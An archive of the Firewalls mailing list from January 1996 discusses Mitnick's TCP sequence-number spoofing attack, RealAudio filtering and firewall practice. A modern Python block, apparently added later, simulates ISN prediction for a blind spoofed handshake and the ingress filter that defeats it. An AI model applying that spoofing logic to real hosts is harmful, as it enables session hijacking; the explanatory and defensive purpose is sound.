widespread use >> until this series of attacks was demonstrated. Papers had been around >> for years on the potential for this, but, as I recall, until this time, >> there weren't any hacker tools that were widely known about for exploiting. > >I agree, but the possibility is always there. If you are in the security >business, then it pays to protect against everything possible, and not to >underestimate your "adversaries." > >> Remember, (Not that this means anything but), the CERT advisory wasn't >> published until 1/23 95 and the attacks took place over Xmas of '94. 
>> To the best of my recollection, the sequence number randomizing (which >> is MUCH harder to implement than the router rules that prevent spoofing) >> wasn't available until January of '95 either. >> Now, CERT is usually slow about announcing such things, but, the patch >> was relatively simple to implement in a router, so, you'd think that >> not long after they heard about it, it would be posted. Even the sites > >That doesn't necessarily mean anything. I've seen advisories come out >from cert WELL after other advisories have come out on other mailing >lists, with patches and everything. > No, it doesn't, but, on the other hand, can one defend against every 'possible' attack that somebody has written a white paper on in the last 10 years? In this case, the CERT, Bugtraq, CIAC, 8lgm, and all the other advisories that normally appear were all after the event in question, in my recollection. (In fact, some of them never even had advisories.) > >I think my point is that Shimomura should not have underestimated Mitnick >or anyone, especially since he KNEW that it was possible. >Overconfidence? I don't know. Maybe Shimomura didn't even set up the >security there and trusted it? I don't know. I just find it kinda ironic. > Possibly, but people can't be omniscient either. Perhaps it was a justifiable oversight on some several year old information that he (and everyone else I might add) thought wouldn't become an exploit script. I'm just saying that there's a lot of speculation going on about if he knew that the attack was actually occurring at the time. I think it started becoming widespread (but not publicized) about November of '94. Most of the people on the firewall list were unaware of it at that time as well. I honestly don't know the answer, just pointing out plausible reasons. Knowing it's possible is different than knowing it actually works and is being used. 
It's possible that a meteor will hit my house, knowing that, I could take precautions and try to build a really expensive bubble and radar interfaced laser system around my house. Now, this isn't exactly a fair comparison, since, defending against this attack is usually REALLY easy.. :) Well, I think I've said enough on the subject. Lots of speculation on few facts. -Over and out -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu Pro is to Con as progress is to congress From firewalls-owner Thu Jan 11 08:05:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA22505 for firewalls-outgoing; Thu, 11 Jan 1996 07:15:10 -0800 (PST) Received: from softserv.tcst.com (softserv.spectrum.titan.com [199.1.156.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA22500 for ; Thu, 11 Jan 1996 07:15:02 -0800 (PST) Received: (from tighe@localhost) by softserv.tcst.com (8.6.12/8.6.12) id JAA20489; Thu, 11 Jan 1996 09:12:45 -0600 From: Mike Tighe Message-Id: <199601111512.JAA20489@softserv.tcst.com> Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG To: Scott_Rickard@mc.xerox.com (Rickard, Scott) Date: Thu, 11 Jan 1996 09:12:45 -0600 (CST) Cc: firewalls@GreatCircle.COM, brain21@montag33.residence.gatech.edu, jya@pipeline.com, frankw@in.net Reply-To: tighe@spectrum.titan.com In-Reply-To: <"<7124F430819C2976>7124F430819C2976@x-mc-xrx2-ms3.xerox"@-SMF-> from "Rickard,Scott" at Jan 10, 96 12:39:33 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rickard,Scott writes: >The answer is quite clear if you have spook world experience and >identify with several key elements quoted in Frank Willoughby's >re-post of the Cypherpunks mailing list message 
regarding extracts >from Jonathan Littman's book "The Fugitive Game: Online With Kevin Mitnick," This is a great tale, but until people start turning up dead like they did in Stoll's case, it will be highly suspect. From firewalls-owner Thu Jan 11 08:14:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA22538 for firewalls-outgoing; Thu, 11 Jan 1996 07:16:43 -0800 (PST) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA22533 for ; Thu, 11 Jan 1996 07:16:39 -0800 (PST) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id JAA24510; Thu, 11 Jan 1996 09:09:17 -0600 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma024508; Thu Jan 11 09:09:15 1996 Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA00773 (5.67b/IDA-1.5); Thu, 11 Jan 1996 09:22:15 -0600 Date: Thu, 11 Jan 1996 09:22:15 -0600 From: Ken Hardy Message-Id: <199601111522.AA00773@ignatz.bridge.com> To: cjwoods@wire.paladin.com Subject: Re: UDP and the unclean... Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris Woods spake thusly: >RealAudio "randomizes" the UDP port that it tries to >connect to within a range. That means that to accept RealAudio on your >protected network, you must open a hole in your filter to allow UDP on a There is also a TCP connection for realaudio. I presume that this is used for control purposes. Does anyone know whether information concerning the source and/or destination UDP port to be used are first conveyed over the TCP connection? If so it might be possible, given protocol details, to write an intelligent proxy that would only allow "legitimate" realaudio packets through. (Don't you love proprietary protocols?) 
-- KH From firewalls-owner Thu Jan 11 08:44:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA23184 for firewalls-outgoing; Thu, 11 Jan 1996 07:35:05 -0800 (PST) Received: from ns2.emirates.net.ae (ns2.emirates.net.ae [194.170.1.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA23162 for ; Thu, 11 Jan 1996 07:34:49 -0800 (PST) Received: from csb042.emirates.net.ae by ns2.emirates.net.ae (5.x/SMI-SVR495081401) id AA17249; Thu, 11 Jan 1996 19:33:24 +0400 Date: Thu, 11 Jan 1996 19:33:23 +0400 Message-Id: <9601111533.AA17249@ns2.emirates.net.ae> X-Sender: gscpraba@emirates.net.ae X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Andrew Cameron From: gscpraba@ns2.emirates.net.ae (G.S.C.Prabhakar (The Sun)) Subject: Re: Internet Policy/Security Policy Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >I would like to know where I can find examples of an Internet/Security >Policy for a company. > >I will need to write one in the near future and would like to draw on >the experience of others. > You can refer to RFC 1108, RFC 1038 as a starting point. GSC Prabhakar **************************************************************************** ***** G.S.C.Prabhakar (gscpraba@emirates.net.ae) Director ( Internet Security, Solutions and Training) Global Systems Consultants ,P.O.Box 72432 , Abu Dhabi.,United Arab Emirates. 
Pager :(00-971-8) 91-555-304*Yournumber# Phone : 00-(971-2)-762080 Consultancy Office :(00-971-4-)-687711 ** Fax :00- (971-4)-687265 **************************************************************************** ******* From firewalls-owner Thu Jan 11 08:44:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA22411 for firewalls-outgoing; Thu, 11 Jan 1996 07:12:58 -0800 (PST) Received: from softserv.tcst.com (softserv.spectrum.titan.com [199.1.156.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA22406 for ; Thu, 11 Jan 1996 07:12:54 -0800 (PST) Received: (from tighe@localhost) by softserv.tcst.com (8.6.12/8.6.12) id JAA20468; Thu, 11 Jan 1996 09:10:36 -0600 From: Mike Tighe Message-Id: <199601111510.JAA20468@softserv.tcst.com> Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG To: Scott_Rickard@mc.xerox.com (Rickard, Scott) Date: Thu, 11 Jan 1996 09:10:36 -0600 (CST) Cc: firewalls@GreatCircle.COM, brain21@montag33.residence.gatech.edu, jya@pipeline.com, frankw@in.net Reply-To: tighe@spectrum.titan.com In-Reply-To: <"<7124F430819C2976>7124F430819C2976@x-mc-xrx2-ms3.xerox"@-SMF-> from "Rickard,Scott" at Jan 10, 96 12:39:33 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rickard,Scott writes: >>I would like to know this... if Shimomura is so good (an I actually >>believe that he may be) then why did he leave the r-utils enabled? Why >>did he not use TCPWrappers to prevent spoofing? Why did he allow people >>to see inside his network (Mitnick saw that there was a machine >>"X-something" that he believed was trusted by Shimomura's machine)? Obviously there were some holes in his system that should have been plugged, but that does not mean it was his responsibility to have fixed them? 
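The thread above turns on two facts: the 1994 attack on Shimomura's hosts worked because the victim's TCP initial sequence numbers could be extrapolated from a couple of probe connections, and the router-side defence (the "deny incoming <internal addresses>" rule the list keeps calling easy) stops the spoofed SYN before ISN quality ever matters. The following Python is an added example written for this archive, not code posted by anyone in the thread. It models a constant-increment ISN generator (the step value, seed and addresses are assumptions standing in for the old BSD-derived behaviour, not measured values), shows the attacker predicting the next ISN and completing a blind three-way handshake from a forged source, shows the same attack failing against a randomised ISN, and shows the ingress filter rule that drops the forged SYN at the border. The trusted host's silence during the real attack (it was flooded so it could not RST the bogus connection) is assumed rather than simulated.

```python
"""Blind TCP spoofing against predictable vs. random ISNs, plus the
anti-spoof ingress rule.  Added illustration; constants are assumptions."""
import ipaddress
import secrets

MOD = 1 << 32  # TCP sequence space


class PredictableISN:
    """Assumed model of an old BSD-style generator: the ISN advances by a
    fixed step per connection.  The exact step does not matter to the attack;
    only the fact that it is constant does."""

    def __init__(self, seed, step=64000):
        self.state = seed % MOD
        self.step = step

    def next_isn(self):
        self.state = (self.state + self.step) % MOD
        return self.state


class RandomISN:
    """The fix the thread calls 'MUCH harder to implement': unpredictable ISNs."""

    def next_isn(self):
        return secrets.randbits(32)


def predict_next_isn(samples):
    """Attacker's side: open two real connections to the target, read the
    ISNs it hands back, and extrapolate the one it will use next."""
    a, b = samples[-2], samples[-1]
    step = (b - a) % MOD
    return (b + step) % MOD


def blind_spoof(server_isn_gen, attacker_guess):
    """Server's side of a handshake whose SYN carries a forged (trusted) source.
    The SYN/ACK goes to the trusted host, so the attacker never sees the real
    ISN; the forged third packet is accepted only if its ACK == ISN + 1."""
    server_isn = server_isn_gen.next_isn()
    forged_ack = (attacker_guess + 1) % MOD
    return forged_ack == (server_isn + 1) % MOD


def run_attack(gen, probes=2):
    """Full sequence: probe connections, prediction, forged handshake.
    Returns True if the server accepted the spoofed connection."""
    samples = [gen.next_isn() for _ in range(probes)]  # attacker's own connections
    guess = predict_next_isn(samples)
    return blind_spoof(gen, guess)


# Assumed internal address space for the ingress rule.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]


def ingress_filter(arrival_iface, src_ip, internal=INTERNAL_NETS):
    """First line of the external-interface ACL: a packet arriving from the
    outside must never claim an inside source.  Returns 'deny' or 'permit'.
    This kills the forged SYN regardless of how good the ISNs are."""
    addr = ipaddress.ip_address(src_ip)
    if arrival_iface == "external" and any(addr in net for net in internal):
        return "deny"
    return "permit"


if __name__ == "__main__":
    print("predictable ISN, spoof accepted:", run_attack(PredictableISN(12345)))
    print("random ISN, spoof accepted:     ", run_attack(RandomISN()))
    # The forged SYN claims trusted inside host 10.0.0.5 but arrives outside.
    print("border router verdict on forged SYN:", ingress_filter("external", "10.0.0.5"))
    print("same address seen on inside port:   ", ingress_filter("internal", "10.0.0.5"))
```

Two probe connections are enough against a constant step; against the random generator the attacker's guess is right with probability 2^-32, which is the whole point of randomising. The filter is deliberately interface-aware: the same source address is legitimate on the inside port, which is why Padgett's version puts the rule on the outside port (or a separate bastion-network port) rather than globally.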
From firewalls-owner Thu Jan 11 08:46:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA22602 for firewalls-outgoing; Thu, 11 Jan 1996 07:19:20 -0800 (PST) Received: from bv.com (bv.com [147.182.5.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA22597 for ; Thu, 11 Jan 1996 07:19:16 -0800 (PST) Received: by bv.com; id JAA03722; Thu, 11 Jan 1996 09:13:17 -0600 (CST) Received: by at3038p.kc.bv.com with Microsoft Mail id <30F54634@at3038p.kc.bv.com>; Thu, 11 Jan 96 09:17:40 PST From: "Archer, Barry J." To: "'Firewalls Digest'" Subject: Re: Encryption export laws from US... Date: Thu, 11 Jan 96 09:21:00 PST Message-ID: <30F54634@at3038p.kc.bv.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk *Very* rare for me to see anything from Paul Ferguson that I disagree with, but I think this thread is very applicable to firewall discussions. One of the major can'o'worms I face is how to set up secure USER to Firewall sessions over the Internet. It's not a matter of whether or not I like it, it's coming. Firewall to Firewall encryption is great, but when you have nomadic remote users and small international offices individual access gets important for a lot of folks. Plus, some countries now seem to have more reliable Internet access than private voice/data line access...which is actually what prompted the first inquiry I got for 'why can't I..." My nightmare is a different solution for each and every country... Barry Archer archerbj@bv.com "These opinions are mine, Mine, MINE!" - me "Who cares?" - my cat >From: Paul Ferguson >Date: Wed, 10 Jan 1996 21:23:26 -0500 >Subject: Re: Encryption export laws from US.. > >You may want to redirect this request to the cypherpunks mailing >list instead, where you have a more on-topic >audience. 
> >- - paul From firewalls-owner Thu Jan 11 08:48:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA23117 for firewalls-outgoing; Thu, 11 Jan 1996 07:33:15 -0800 (PST) Received: from inet1.tek.com (inet1.tek.com [134.62.48.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA23098 for ; Thu, 11 Jan 1996 07:33:02 -0800 (PST) Received: by inet1.tek.com id ; Thu, 11 Jan 1996 07:31:57 -0800 Received: from tektronix.tek.com(134.62.48.24) by inet1 via smap (V1.3) id sma039035; Thu Jan 11 07:31:26 1996 Received: from orca.wv.tek.com by tektronix.TEK.COM (4.1/8.2) id AA24607; Thu, 11 Jan 96 07:31:25 PST Received: from trouble.WV.TEK.COM by orca.wv.tek.com (4.1/8.2) id AA17961; Thu, 11 Jan 96 07:32:51 PST Received: by trouble.WV.TEK.COM (4.1/8.0) id AA03270; Thu, 11 Jan 96 07:30:43 PST Date: Thu, 11 Jan 1996 07:30:42 -0800 (PST) From: Kent Dahlgren To: Brett Lymn Cc: Brain21 , firewalls@greatcircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: <9601110955.AA27779@bunya.awadi> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Brett Lymn wrote: > According to Brain21: > > > >Hell, my father used > >to do top secret work for the Dept. of Defense (he neede "Q" clearance, > >and needs higher now) and the office where he worked communicated to it's > >other offices over the net. They used netcom. Not too terribly secure > >if you ask me. They did not use encryption. > > Ummmm I suspect that things may be a bit different to that which you > have implied. Even in an organisation handling secret material a lot > of the day to day running of the place is not classified - you know, > things like when the next barbeque (or cook-out or whatever word you > guys use for the process of carbonising meat over a flame outdoors > whilst getting drunk.... 
:*) will be or getting someone to order more > pens for the stationery cabinet - such things are not and should not > be classified. I bet all the secret documents/matters were not sent > over the net (though I could be wrong....) - it is certainly the way > things work here. I hold a TS SCI clearance with the Air Force. I've been in for almost 10 years, and I've never heard of a "Q" clearance. Not to say there isn't any such thing; I don't pretend to know everything. But classified traffic is never (supposed to) travel over the 'net. That's what AUTODIN is for. Not that it can't be done, its just that I suspect that if the gentleman's father was deemed trustworthy enough to hold a "Q" clearance, then he can be trusted to understand the legal implications of transmitting secure traffic over unsecured means. Every time you use the phone from a military installation, you run the risk of being listened to. Even the most incompetent troop understands what happens to him/her if they handle classified information sloppily. The worst violations of that have been minor mentions of things like "...man, we spent the day putting snow tires on trucks.." which can be just as bad. Again, while regular Internet E-mail is used for basic communication, very few will jeopardise themselves needlessly and foolishly by sending classified traffic, which is strictly accounted for, over Internet E-mail. 
______________________________________________________________________________ ______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______ / Voice: 1.800.835.6100 E-mail: support@colorprinters.tek.com Fax: 1.503.685.3063 WWW: www.tek.com BBS: 1.503.685.4504 E-World: Keyword Tektronix HAL: 1.503.682.7450 AOL: Keyword Tektronix Service: 1.800.835.6100 FTP: ftp.tek.com ______________________________________________________________________________ From firewalls-owner Thu Jan 11 08:53:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA22155 for firewalls-outgoing; Thu, 11 Jan 1996 07:01:41 -0800 (PST) Received: from switchblade.v-one.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA22150 for ; Thu, 11 Jan 1996 07:01:36 -0800 (PST) Received: (from mjr@localhost) by switchblade.v-one.com (8.6.9/8.6.9) id KAA12166 for Firewalls@GreatCircle.COM; Thu, 11 Jan 1996 10:00:49 -0500 From: "Marcus J. Ranum" Message-Id: <199601111500.KAA12166@switchblade.v-one.com> Subject: Re: Firewalls-Digest V5 #16 To: Firewalls@GreatCircle.COM Date: Thu, 11 Jan 1996 10:00:49 -0500 (EST) In-Reply-To: <199601110730.XAA06814@miles.greatcircle.com> from "firewalls-digest-owner@uunet.uu.net" at Jan 10, 96 11:30:28 pm Reply-To: mjr@switchblade.v-one.com Organization: V-One Corporation, Baltimore, MD Office URL: Mjr's page Phone: 410-889-8569 X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brain21 writes: >I would not be >surprised if many of the security experts out there worked on less secure >machines than what they set up for their clients. I'll tell you the secret, if you promise not to spread it around. :) The box I'm using here ("here" is V-ONE's Baltimore office; my house) is a BSDI box running an older rev and I probably haven't patched all the patches I should. 
It's got a lot of unnecessary services stripped out, but you can, for example, even use "finger" on it. That's because this box is just an access point. The important stuff takes place on another machine upstairs, and on a Windows95 PC that's right next to it. Data crosses the air gap on floppies, when it has to, which is seldom. There isn't any special security or anything on "switchblade" because there doesn't need to be. Now, here's the secret: 1) My home computer security architecture is the result of a carefully thought-out risk assessment and requirements analysis. It goes like this: a) I have important stuff on my Windows PC and PC networking sucks so I can make my life a lot easier by just not worrying about getting my PC running TCP/IP and it'll be secure besides. b) I only seldom need to transfer data between the Windows PC and the Internet, and when I do it is important stuff so having a spare copy on a floppy is a Good Thing. c) Swapping floppies is technically gross and someone may laugh at me, but I can live with that. d) I have a complete copy of the machine on a DAT. If someone fries the system I'll be back on the air in a few hours. I'll be inconvenienced. e) I can't afford a firewall, and don't know how to build one. 2) The residual risk is that someone might break into switchblade and announce that they had "hakk3d that l8m3r mjr" and it'd probably cost me a few hours explaining to people why that was Not A Big Deal and it'd be very irritating, and I'd have some after the fact damage control and who knows someone might think it was all an NSA conspiracy. [Which is patent nonsense, since I work for the KGB, not NSA] 3) If damage control is an issue, I've now protected myself by loudly announcing to a large mailing list that *MY* Internet box is unimportant. 
Therefore, if something does happen to it, I've already pulled the teeth from the public relations problem since everyone on the list knows that only a totally lamer hacker would go after a useless unprotected glorified Xterm and Email box. There is another ancillary tactic I won't go into, which is "plausible deniability" in which I would simply try to *convince* everyone the machine was unimportant while in fact it was. I'm not doing that here because real deniability beats plausible deniability hands down. :) Incidentally, the main "security" on "switchblade" is what I have dubbed "Security by stupidity." Feel free to telnet to the "switchblade.v-one.com" and poke around. Nothing is harmful, no salesmen will call, no paratroopers will land. Please don't trash my machine because it'll take me an hour to reload it from the DAT and I will feel morally obligated to yell at you if we ever meet. I suspect, but I don't know, that Tsutomu would probably say something similar. The game of securing systems is correctly balancing risks against technical responses to risk. If you can convince yourself the risks are low, then the technical responses required are also low. If you don't take the time to figure out what's at stake you can't produce a measured, appropriate response. mjr. 
From firewalls-owner Thu Jan 11 09:38:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA23307 for firewalls-outgoing; Thu, 11 Jan 1996 07:38:47 -0800 (PST) Received: from inet1.tek.com (inet1.tek.com [134.62.48.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA23297 for ; Thu, 11 Jan 1996 07:38:10 -0800 (PST) Received: by inet1.tek.com id ; Thu, 11 Jan 1996 07:37:12 -0800 Received: from tektronix.tek.com(134.62.48.24) by inet1 via smap (V1.3) id sma035172; Thu Jan 11 07:37:02 1996 Received: from orca.wv.tek.com by tektronix.TEK.COM (4.1/8.2) id AA25052; Thu, 11 Jan 96 07:37:01 PST Received: from trouble.WV.TEK.COM by orca.wv.tek.com (4.1/8.2) id AA18058; Thu, 11 Jan 96 07:38:28 PST Received: by trouble.WV.TEK.COM (4.1/8.0) id AA03307; Thu, 11 Jan 96 07:36:21 PST Date: Thu, 11 Jan 1996 07:36:20 -0800 (PST) From: Kent Dahlgren To: Benjamin Allan Smith Cc: firewalls@greatcircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: <199601111046.CAA18112@archimedes.vislab.navy.mil> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Benjamin Allan Smith wrote: > I highly doubt that. Every machine that I have seen on base which has > Secret (or higher) data is not allowed to have *any* physical connection with > the internet (the mjr 100% sure firewall to the internet--cut the wires). > Once someone inadvertantly emailed the classified name of a project over > a network connected to the Internet. The day was spent completely wiping > all of the hard drives on all of the machines that might have received that > email (3 complete overwrites with random data if I recall correctly) and then > the OS and data were restored from the previous night's backups. A head > rolled for that error. 
So if all that effort was made over a single word, I > *highly* doubt that your father used netcom to discuss classified matters. > Thank you, sir. ______________________________________________________________________________ ______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______ / Voice: 1.800.835.6100 E-mail: support@colorprinters.tek.com Fax: 1.503.685.3063 WWW: www.tek.com BBS: 1.503.685.4504 E-World: Keyword Tektronix HAL: 1.503.682.7450 AOL: Keyword Tektronix Service: 1.800.835.6100 FTP: ftp.tek.com ______________________________________________________________________________ From firewalls-owner Thu Jan 11 09:41:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA25812 for firewalls-outgoing; Thu, 11 Jan 1996 08:42:30 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA25807 for ; Thu, 11 Jan 1996 08:42:26 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id IAA01901; Thu, 11 Jan 1996 08:39:30 -0800 Received: from panix.com(198.7.0.2) by mycroft via smap (V1.3mjr) id sma001895; Thu Jan 11 08:39:11 1996 Received: (from owend@localhost) by panix.com (8.7/8.7/PanixU1.3) id LAA18095 for Firewalls@GreatCircle.com; Thu, 11 Jan 1996 11:39:27 -0500 (EST) From: Owen Davis Message-Id: <199601111639.LAA18095@panix.com> Subject: NT Fire Wall To: Firewalls@GreatCircle.com Date: Thu, 11 Jan 1996 11:39:26 -0500 (EST) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I, like many others, am giving NT a shot for some of my networking needs. Do you know of an excellent NT Firewall ? Thank you much in advance. 
Owen Davis From firewalls-owner Thu Jan 11 09:42:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA25999 for firewalls-outgoing; Thu, 11 Jan 1996 08:49:48 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA25994 for ; Thu, 11 Jan 1996 08:49:40 -0800 (PST) Date: Thu, 11 Jan 1996 11:48:38 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960111114838.20201c39@hobbes.orl.mmc.com> Subject: re: Sequence Number Attacks Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I rote: >> Is easy also to make the first line in your firewall ACL "Deny incoming >> ". Belt and suspenders are good 8*). Scott wreplied: >Wouldn't doing this break some MUA's that are looking to connect to >their smtp server locally or the system defined as mailhost (which is >usually never defined as localhost)? Only if the mailhost is sitting outside the firewall. In the case of a bastion network, I prefer to use a different port on the router with its own ACL. NO internal address should be coming in from the outside to *any* port, not just the "r"s. 
Warmly, Padgett From firewalls-owner Thu Jan 11 09:44:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA26416 for firewalls-outgoing; Thu, 11 Jan 1996 09:23:33 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA26384 for ; Thu, 11 Jan 1996 09:22:43 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id IAA01999; Thu, 11 Jan 1996 08:57:32 -0800 Received: from milka.bothgood.com(152.160.74.1) by mycroft via smap (V1.3mjr) id sma001995; Thu Jan 11 08:56:46 1996 Received: (from zhen@localhost) by milka.bothgood.com (8.6.12/8.6.9) id NAA07125; Thu, 11 Jan 1996 13:12:15 -0500 Date: Thu, 11 Jan 1996 13:12:15 -0500 (EST) From: Zhen To: firewalls@GreatCircle.COM Subject: WWW Server and Firewall Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, I would like to know whether it is possible to setup a WWW server inside of the firewall and avoid the WWW server communicating directly with the Internet? Any advice will be helpful and Thanks in advance! 
Zhen Xu zhen@milka.bothgood.com From firewalls-owner Thu Jan 11 09:48:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA26220 for firewalls-outgoing; Thu, 11 Jan 1996 09:07:40 -0800 (PST) Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA26215 for ; Thu, 11 Jan 1996 09:07:30 -0800 (PST) Received: (from nobody@localhost) by tera.bctel.net (8.7.1/8.7.1) id JAA16244; Thu, 11 Jan 1996 09:05:40 -0800 (PST) X-Authentication-Warning: tera.bctel.net: nobody set sender to using -f Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma016241; Thu Jan 11 09:05:20 1996 Received: (from murrell@localhost) by mocha.bctel.net (8.7.1/8.7.1) id JAA18920; Thu, 11 Jan 1996 09:05:29 -0800 (PST) Date: Thu, 11 Jan 1996 09:05:29 -0800 (PST) From: Brian Murrell Message-Id: <199601111705.JAA18920@mocha.bctel.net> To: Firewalls@GreatCircle.COM, mjr@switchblade.v-one.com Subject: Re: Firewalls-Digest V5 #14 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-MD5: FIyg765G8u4KKq/xdJ3jyA== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > To make matters worse a lot of UDP applications (most > notably Sun RPC, and RealAudio) run on arbitrary ports, which > makes them even harder to sensibly track. A lot of folks are > comfortable letting UDP port 53 (DNS) into their firewalls. > DNS is pretty well-known and well-behaved. Not so RPC. Some points and questions. Real Audio can be handled by a "stateful packet filter". Firewall-1 have recently put some filtering rules on their Web site for FW-1 users to add to their rulebase to allow RealAudio in. I checked just to make sure they weren't opening the big hole. The datastream does seem to carry the return port in the clear much like FTP's data connection PORT command. It's a little more complicated but the theory is the same. 
I do agree that the unpredictability of RPC application port numbers is a pain, but stateful packet filters solve that problem. They watch for the portmapper traffic to "learn" what services are on what ports. However, is the RPC infrastructure itself without any actual RPC programs insecure?? Does it have any vulnerabilities in and of itself, or is the nature of RPC and how it maps ports (somewhat randomly) from a pool that you find insecure?? Do the actual applications that use RPC calls have any "extra vulnerabilities" because they were written with RPCs?? Can you point me to any papers on any of the above?? b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5261 From firewalls-owner Thu Jan 11 09:49:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA25243 for firewalls-outgoing; Thu, 11 Jan 1996 08:24:40 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA25235 for ; Thu, 11 Jan 1996 08:24:31 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id LAA19797; Thu, 11 Jan 1996 11:22:31 -0500 Date: Thu, 11 Jan 1996 11:22:31 -0500 (EST) From: Brain21 To: Frank Willoughby cc: firewalls@GreatCircle.COM Subject: Re: Fw License In-Reply-To: <9601091755.AA27180@su1.in.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 9 Jan 1996, Frank Willoughby wrote: > Sudden growth (mergers, acquisitions, etc) could impact the licensing > of the firewall & either get the customer in hot water with SPA or the > vendor or face a denial-of-service for those extra connections until OK, this is a little off-topic, and I will probably get flamed for this... 
I could be wrong, so someone correct me if I am (as I am sure you will).

